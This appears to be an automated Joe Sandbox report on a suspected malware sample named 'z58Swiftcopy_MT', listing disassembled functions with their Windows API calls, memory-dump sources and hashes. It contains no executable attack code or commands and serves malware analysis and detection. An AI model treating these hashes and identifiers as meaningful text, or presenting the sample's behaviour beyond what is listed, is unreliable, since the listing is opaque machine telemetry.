                                                                                                                                                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                                      Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                                                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                                      Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                                      Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                                                                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                                      Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                                      Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                                      Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                                                                      Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                                                                      Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                                      Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                                      Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                      • String ID: d=E
                                                                                                                                                                                                                                      • API String ID: 909852535-3703654223
                                                                                                                                                                                                                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                                      Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                                                                                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                                      Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                                      • String ID: URL
                                                                                                                                                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                                      Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                                                                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                                      Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                                      Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401917
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                                                                                      • API String ID: 4036792311-2823255486
